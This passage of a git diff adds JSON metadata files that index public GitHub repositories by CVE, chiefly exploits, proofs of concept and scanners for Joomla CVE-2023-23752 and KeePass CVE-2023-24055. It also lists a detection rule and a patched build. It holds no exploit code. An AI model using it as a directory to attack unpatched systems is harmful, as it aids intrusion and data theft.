"https:\/\/github.com\/yTxZx\/CVE-2023-23752", + "description": null, + "fork": false, + "created_at": "2023-10-20T08:17:48Z", + "updated_at": "2023-10-20T08:19:57Z", + "pushed_at": "2023-10-20T08:35:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 707706726, + "name": "CVE-2023-23752", + "full_name": "AlissonFaoli\/CVE-2023-23752", + "owner": { + "login": "AlissonFaoli", + "id": 129133392, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129133392?v=4", + "html_url": "https:\/\/github.com\/AlissonFaoli", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AlissonFaoli\/CVE-2023-23752", + "description": "Joomla Unauthenticated Information Disclosure (CVE-2023-23752) exploit", + "fork": false, + "created_at": "2023-10-20T13:32:28Z", + "updated_at": "2024-04-25T19:49:11Z", + "pushed_at": "2024-04-25T19:49:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 709715554, + "name": "CVE-2023-23752", + "full_name": "Pushkarup\/CVE-2023-23752", + "owner": { + "login": "Pushkarup", + "id": 148672587, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148672587?v=4", + "html_url": "https:\/\/github.com\/Pushkarup", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pushkarup\/CVE-2023-23752", + "description": "Exploit for CVE-2023-23752 (4.0.0 <= Joomla <= 4.2.7).", + "fork": false, + "created_at": "2023-10-25T08:53:12Z", + "updated_at": "2024-03-26T00:00:16Z", + "pushed_at": "2023-10-25T09:39:10Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 711978619, + "name": "CVE-2023-23752", + "full_name": "blacks1ph0n\/CVE-2023-23752", + "owner": { + "login": "blacks1ph0n", + "id": 139291686, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/139291686?v=4", + "html_url": "https:\/\/github.com\/blacks1ph0n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/blacks1ph0n\/CVE-2023-23752", + "description": "Joomla Unauthorized Access Vulnerability", + "fork": false, + "created_at": "2023-10-30T14:54:56Z", + "updated_at": "2023-10-30T14:54:57Z", + "pushed_at": "2023-11-03T19:14:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 724701583, + "name": "Joomla-v4.2.8---CVE-2023-23752", + "full_name": "Youns92\/Joomla-v4.2.8---CVE-2023-23752", + "owner": { + "login": "Youns92", + "id": 56968891, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56968891?v=4", + "html_url": "https:\/\/github.com\/Youns92", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Youns92\/Joomla-v4.2.8---CVE-2023-23752", + "description": "CVE-2023-23752 ", + "fork": false, + "created_at": "2023-11-28T16:08:16Z", + "updated_at": "2024-08-23T15:19:33Z", + "pushed_at": "2023-11-28T16:27:37Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 725209716, + "name": "Joomla-CVE-2023-23752-Exploit-Script", + "full_name": "Ly0kha\/Joomla-CVE-2023-23752-Exploit-Script", + "owner": { + "login": "Ly0kha", + "id": 8098943, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8098943?v=4", + "html_url": "https:\/\/github.com\/Ly0kha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ly0kha\/Joomla-CVE-2023-23752-Exploit-Script", + "description": "Joomla CVE-2023-23752 Exploit Script", + "fork": false, + "created_at": "2023-11-29T17:01:08Z", + "updated_at": "2023-11-29T17:03:00Z", + "pushed_at": "2023-11-29T17:07:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 725708886, + "name": "CVE-2023-23752", + "full_name": "r3dston3\/CVE-2023-23752", + "owner": { + "login": "r3dston3", + "id": 152495093, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152495093?v=4", + "html_url": "https:\/\/github.com\/r3dston3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r3dston3\/CVE-2023-23752", + "description": null, + "fork": false, + "created_at": "2023-11-30T17:55:38Z", + "updated_at": "2024-02-21T00:50:58Z", + "pushed_at": "2023-11-30T18:07:48Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 725802473, + "name": "CVE-2023-23752", + "full_name": "svaltheim\/CVE-2023-23752", + "owner": { + "login": "svaltheim", + "id": 30341113, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30341113?v=4", + "html_url": "https:\/\/github.com\/svaltheim", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/svaltheim\/CVE-2023-23752", + "description": null, + "fork": false, + "created_at": "2023-11-30T22:47:40Z", + "updated_at": "2023-11-30T23:01:00Z", + "pushed_at": "2023-11-30T23:03:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 725855935, + "name": "Joomla-CVE-2023-23752", + "full_name": "Fernando-olv\/Joomla-CVE-2023-23752", + "owner": { + "login": "Fernando-olv", + "id": 70062249, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70062249?v=4", + "html_url": "https:\/\/github.com\/Fernando-olv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Fernando-olv\/Joomla-CVE-2023-23752", + "description": "This Python implementation serves an educational purpose by demonstrating the exploitation of CVE-2023-23752. The code provides insight into the vulnerability's exploitation.", + "fork": false, + "created_at": "2023-12-01T02:25:04Z", + "updated_at": "2023-12-04T21:33:52Z", + "pushed_at": "2023-12-04T00:34:37Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 727232698, + "name": "CVE-2023-23752-EXPLOIT", + "full_name": "K3ysTr0K3R\/CVE-2023-23752-EXPLOIT", + "owner": { + "login": "K3ysTr0K3R", + "id": 70909693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4", + "html_url": "https:\/\/github.com\/K3ysTr0K3R", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2023-23752-EXPLOIT", + "description": "A PoC exploit for CVE-2023-23752 - Joomla Improper Access Check in Versions 4.0.0 through 4.2.7", + "fork": false, + "created_at": "2023-12-04T13:05:08Z", + "updated_at": "2024-12-29T01:32:00Z", + "pushed_at": "2023-12-04T13:30:56Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-23752", + "exploit", + "hacking", + "joomla", + "poc" + ], + "visibility": "public", + "forks": 4, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 730330313, + "name": "CVE-2023-23752_Joomla", + "full_name": "hadrian3689\/CVE-2023-23752_Joomla", + "owner": { + "login": "hadrian3689", + "id": 71423134, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71423134?v=4", + "html_url": "https:\/\/github.com\/hadrian3689", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hadrian3689\/CVE-2023-23752_Joomla", + "description": null, + "fork": false, + "created_at": "2023-12-11T17:30:31Z", + "updated_at": "2023-12-11T17:34:23Z", + "pushed_at": "2023-12-11T17:34:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 730952063, + "name": "CVE-2023-23752", + "full_name": "C1ph3rX13\/CVE-2023-23752", + "owner": { + "login": "C1ph3rX13", + "id": 80873500, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80873500?v=4", + "html_url": "https:\/\/github.com\/C1ph3rX13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/C1ph3rX13\/CVE-2023-23752", + "description": "CVE-2023-23752 Joomla Unauthenticated Information Disclosure", + "fork": false, + "created_at": "2023-12-13T03:13:54Z", + "updated_at": "2023-12-13T03:32:32Z", + "pushed_at": "2023-12-25T10:24:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 732835153, + "name": "CVE-2023-23752", + "full_name": "JeneralMotors\/CVE-2023-23752", + "owner": { + "login": "JeneralMotors", + "id": 60910202, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60910202?v=4", + "html_url": "https:\/\/github.com\/JeneralMotors", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JeneralMotors\/CVE-2023-23752", + "description": "An access control flaw was identified, potentially leading to unauthorized access to critical webservice endpoints within Joomla! CMS versions 4.0.0 through 4.2.7. This vulnerability could be exploited by attackers to gain unauthorized access to sensitive information or perform unauthorized actions.", + "fork": false, + "created_at": "2023-12-18T00:47:27Z", + "updated_at": "2023-12-18T01:42:50Z", + "pushed_at": "2023-12-18T04:27:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 733652712, + "name": "CVE-2023-23752", + "full_name": "gunzf0x\/CVE-2023-23752", + "owner": { + "login": "gunzf0x", + "id": 31874167, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31874167?v=4", + "html_url": "https:\/\/github.com\/gunzf0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gunzf0x\/CVE-2023-23752", + "description": "Binaries for \"CVE-2023-23752\"", + "fork": false, + "created_at": "2023-12-19T20:18:49Z", + "updated_at": "2023-12-19T20:32:57Z", + "pushed_at": "2023-12-19T20:31:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "binaries-included", + "cve-2023-23752", + "go", + "golang" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 734079534, + "name": "CVE-2023-23752", + "full_name": "TindalyTn\/CVE-2023-23752", + "owner": { + "login": "TindalyTn", + "id": 104759010, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104759010?v=4", + "html_url": "https:\/\/github.com\/TindalyTn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TindalyTn\/CVE-2023-23752", + "description": "Mass Scanner for CVE-2023-23752", + "fork": false, + "created_at": "2023-12-20T20:20:15Z", + "updated_at": "2023-12-20T20:21:34Z", + "pushed_at": "2023-12-20T20:22:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 736906405, + "name": "CVE-2023-23752", + "full_name": "shellvik\/CVE-2023-23752", + "owner": { + "login": "shellvik", + "id": 86082783, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86082783?v=4", + "html_url": "https:\/\/github.com\/shellvik", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shellvik\/CVE-2023-23752", + "description": "Joomla Information disclosure exploit code written in C++.", + "fork": false, + "created_at": "2023-12-29T08:09:24Z", + "updated_at": "2023-12-29T08:09:24Z", + "pushed_at": "2023-12-29T08:09:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 759783810, + "name": "CVE-2023-23752", + "full_name": "Rival420\/CVE-2023-23752", + "owner": { + "login": "Rival420", + "id": 51548322, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51548322?v=4", + "html_url": "https:\/\/github.com\/Rival420", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Rival420\/CVE-2023-23752", + "description": "Joomla! < 4.2.8 - Unauthenticated information disclosure exploit", + "fork": false, + "created_at": "2024-02-19T10:27:01Z", + "updated_at": "2024-02-19T10:27:35Z", + "pushed_at": "2024-02-19T11:26:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 770897039, + "name": "CVE-2023-23752", + "full_name": "JohnDoeAnonITA\/CVE-2023-23752", + "owner": { + "login": "JohnDoeAnonITA", + "id": 162304433, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/162304433?v=4", + "html_url": "https:\/\/github.com\/JohnDoeAnonITA", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JohnDoeAnonITA\/CVE-2023-23752", + "description": "CVE-2023-23752 Data Extractor", + "fork": false, + "created_at": "2024-03-12T10:59:10Z", + "updated_at": "2024-05-03T08:40:27Z", + "pushed_at": "2024-05-03T09:05:18Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 785240418, + "name": "CVE-2023-23752", + "full_name": "0xWhoami35\/CVE-2023-23752", + "owner": { + "login": "0xWhoami35", + "id": 107396843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107396843?v=4", + "html_url": "https:\/\/github.com\/0xWhoami35", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xWhoami35\/CVE-2023-23752", + "description": null, + "fork": false, + "created_at": "2024-04-11T13:39:44Z", + "updated_at": "2024-04-14T08:33:21Z", + "pushed_at": "2024-04-11T14:46:16Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 787014993, + "name": "CVE-2023-23752-Python", + "full_name": "mariovata\/CVE-2023-23752-Python", + "owner": { + "login": "mariovata", + "id": 33606897, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33606897?v=4", + "html_url": "https:\/\/github.com\/mariovata", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mariovata\/CVE-2023-23752-Python", + "description": "Joomla! < 4.2.8 - Unauthenticated information disclosure", + "fork": false, + "created_at": "2024-04-15T18:18:02Z", + "updated_at": "2024-04-15T19:36:05Z", + "pushed_at": "2024-04-15T19:34:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 793175121, + "name": "CVE-2023-23752", + "full_name": "0xx01\/CVE-2023-23752", + "owner": { + "login": "0xx01", + "id": 130947610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130947610?v=4", + "html_url": "https:\/\/github.com\/0xx01", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xx01\/CVE-2023-23752", + "description": "A simple bash script to exploit Joomla! < 4.2.8 - Unauthenticated information disclosure", + "fork": false, + "created_at": "2024-04-28T16:32:21Z", + "updated_at": "2024-04-28T16:50:44Z", + "pushed_at": "2024-04-28T16:50:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 796038372, + "name": "CVE-2023-23752", + "full_name": "n3rdh4x0r\/CVE-2023-23752", + "owner": { + "login": "n3rdh4x0r", + "id": 66146701, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66146701?v=4", + "html_url": "https:\/\/github.com\/n3rdh4x0r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/n3rdh4x0r\/CVE-2023-23752", + "description": "Joomla! v4.2.8 - Unauthenticated information disclosure", + "fork": false, + "created_at": "2024-05-04T18:44:12Z", + "updated_at": "2024-05-31T14:11:29Z", + "pushed_at": "2024-05-31T14:11:26Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 796329590, + "name": "CVE-2023-23752-Joomla-v4.2.8", + "full_name": "mil4ne\/CVE-2023-23752-Joomla-v4.2.8", + "owner": { + "login": "mil4ne", + "id": 89859279, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89859279?v=4", + "html_url": "https:\/\/github.com\/mil4ne", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mil4ne\/CVE-2023-23752-Joomla-v4.2.8", + "description": null, + "fork": false, + "created_at": "2024-05-05T16:16:03Z", + "updated_at": "2024-07-26T03:10:17Z", + "pushed_at": "2024-05-05T16:42:39Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 841070470, + "name": "CVE-2023-23752", + "full_name": "Aureum01\/CVE-2023-23752", + "owner": { + "login": "Aureum01", + "id": 71108402, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71108402?v=4", + "html_url": "https:\/\/github.com\/Aureum01", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Aureum01\/CVE-2023-23752", + "description": "A bash automation that exploits the vulnerable endpoints for the Joomla! API 4.0 - 4.2.7", + "fork": false, + "created_at": "2024-08-11T14:55:50Z", + "updated_at": "2024-08-11T15:07:13Z", + "pushed_at": "2024-08-11T15:07:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-23924.json b/2023/CVE-2023-23924.json new file mode 100644 index 0000000000..a3278dac2e --- /dev/null +++ b/2023/CVE-2023-23924.json @@ -0,0 +1,33 @@ +[ + { + "id": 596224234, + "name": "CVE-2023-23924", + "full_name": "motikan2010\/CVE-2023-23924", + "owner": { + "login": "motikan2010", + "id": 3177297, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3177297?v=4", + "html_url": "https:\/\/github.com\/motikan2010", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/motikan2010\/CVE-2023-23924", + "description": "CVE-2023-23924 (Dompdf - RCE) PoC", + "fork": false, + "created_at": "2023-02-01T18:21:23Z", + "updated_at": "2024-06-26T12:04:49Z", + "pushed_at": "2023-02-02T02:05:12Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-23946.json b/2023/CVE-2023-23946.json new file mode 100644 index 0000000000..9de0a28122 --- /dev/null +++ b/2023/CVE-2023-23946.json @@ -0,0 +1,33 @@ +[ + { + "id": 688420580, + "name": "CVE-2023-23946-POC", + "full_name": "bruno-1337\/CVE-2023-23946-POC", + "owner": { + "login": "bruno-1337", + "id": 71904759, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71904759?v=4", + "html_url": "https:\/\/github.com\/bruno-1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bruno-1337\/CVE-2023-23946-POC", + "description": "Explanation and POC of the CVE-2023-23946", + "fork": false, + "created_at": "2023-09-07T10:07:25Z", + "updated_at": "2023-09-07T10:07:26Z", + "pushed_at": "2023-09-13T02:57:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-24044.json b/2023/CVE-2023-24044.json new file mode 100644 index 0000000000..6c259d5bb1 --- /dev/null +++ b/2023/CVE-2023-24044.json @@ -0,0 +1,40 @@ +[ + { + "id": 806027931, + "name": "CVE-2023-24044", + "full_name": "Cappricio-Securities\/CVE-2023-24044", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2023-24044", + "description": "Plesk Obsidian <=18.0.49 - Open Redirect", + "fork": false, + "created_at": "2024-05-26T06:56:05Z", + "updated_at": "2025-01-02T02:37:15Z", + "pushed_at": "2024-06-24T09:03:56Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-24044", + "cve-2023-24044-scanner", + "openredirect", + "plesk-obsidian", + "plesk-obsidian-open-redirect", + "wapt" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-24055.json b/2023/CVE-2023-24055.json new file mode 100644 index 0000000000..48a245e7f1 --- /dev/null +++ b/2023/CVE-2023-24055.json @@ -0,0 +1,229 @@ +[ + { + "id": 592899217, + "name": "CVE-2023-24055", + "full_name": "deetl\/CVE-2023-24055", + "owner": { + "login": "deetl", + "id": 50047716, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50047716?v=4", + "html_url": "https:\/\/github.com\/deetl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/deetl\/CVE-2023-24055", + "description": "POC and Scanner for CVE-2023-24055", + "fork": false, + "created_at": "2023-01-24T19:19:23Z", + "updated_at": "2024-08-12T20:29:28Z", + "pushed_at": "2023-01-25T00:04:57Z", + "stargazers_count": 63, + "watchers_count": 63, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 17, + "watchers": 63, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 593024753, + "name": "CVE-2023-24055_PoC", + "full_name": "alt3kx\/CVE-2023-24055_PoC", + "owner": { + "login": "alt3kx", + "id": 3140111, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alt3kx\/CVE-2023-24055_PoC", + "description": "CVE-2023-24055 PoC (KeePass 2.5x)", + "fork": false, + "created_at": "2023-01-25T03:21:42Z", + "updated_at": "2024-09-14T08:53:21Z", + "pushed_at": "2023-02-10T08:03:59Z", + "stargazers_count": 254, + "watchers_count": 254, + "has_discussions": false, + "forks_count": 38, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 38, + "watchers": 254, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 594744538, + "name": "keepass_CVE-2023-24055_yara_rule", + "full_name": "Cyb3rtus\/keepass_CVE-2023-24055_yara_rule", + "owner": { + "login": "Cyb3rtus", + "id": 68970119, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68970119?v=4", + "html_url": "https:\/\/github.com\/Cyb3rtus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cyb3rtus\/keepass_CVE-2023-24055_yara_rule", + "description": "Contains a simple yara rule to hunt for possible compromised KeePass config files", + "fork": false, + "created_at": "2023-01-29T14:13:44Z", + "updated_at": "2023-07-20T11:05:47Z", + "pushed_at": "2023-03-07T21:32:56Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "scanner", + "security", + "security-tools" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 595134794, + "name": "CVE-2023-24055", + "full_name": "duckbillsecurity\/CVE-2023-24055", + "owner": { + "login": "duckbillsecurity", + "id": 58594630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58594630?v=4", + "html_url": "https:\/\/github.com\/duckbillsecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/duckbillsecurity\/CVE-2023-24055", + "description": "CVE-2023-24055 POC written in PowerShell.", + "fork": false, + "created_at": "2023-01-30T13:22:22Z", + "updated_at": "2024-08-12T20:29:34Z", + "pushed_at": "2023-02-04T19:44:43Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-24055", + "cve-2023-24055-poc", + "keepass", + "poc", + "proof-of-concept" + ], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 595342543, + "name": "PoC_CVE-2023-24055", + "full_name": "julesbozouklian\/PoC_CVE-2023-24055", + "owner": { + "login": "julesbozouklian", + "id": 26013529, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26013529?v=4", + "html_url": "https:\/\/github.com\/julesbozouklian", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/julesbozouklian\/PoC_CVE-2023-24055", + "description": null, + "fork": false, + "created_at": "2023-01-30T22:10:57Z", + "updated_at": "2023-02-15T09:27:08Z", + "pushed_at": "2023-01-31T14:36:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 599394994, + "name": "KeePass-TriggerLess", + "full_name": "digital-dev\/KeePass-TriggerLess", + "owner": { + "login": "digital-dev", + "id": 18492599, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18492599?v=4", + "html_url": "https:\/\/github.com\/digital-dev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/digital-dev\/KeePass-TriggerLess", + "description": "KeePass 2.53.1 with removed ECAS Trigger System Remediating CVE-2023-24055", + "fork": false, + "created_at": "2023-02-09T03:22:25Z", + "updated_at": "2023-02-09T03:23:48Z", + "pushed_at": "2023-02-09T21:49:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 601458156, + "name": "KeePass-CVE-2023-24055", + "full_name": "zwlsix\/KeePass-CVE-2023-24055", + 